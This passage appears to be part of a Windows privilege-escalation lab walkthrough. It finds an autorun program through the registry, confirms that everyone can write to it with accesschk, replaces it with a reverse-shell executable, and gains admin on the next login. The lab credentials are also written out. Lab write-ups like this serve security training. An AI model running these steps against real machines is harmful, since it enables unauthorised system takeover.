as we see we have auto run

now let’s enumerate this manually

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

as we see we got this program.exe so let’s check it’s permissions

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

now as we see the everyone have read and write access to this file so let’s go and replace it with a reverse shell

copy C:\PrivEsc\esc.exe "C:\Program Files\Autorun Program\program.exe" /Y

now let’s start a new rdp session with the username admin and password password123

as we see we are admin now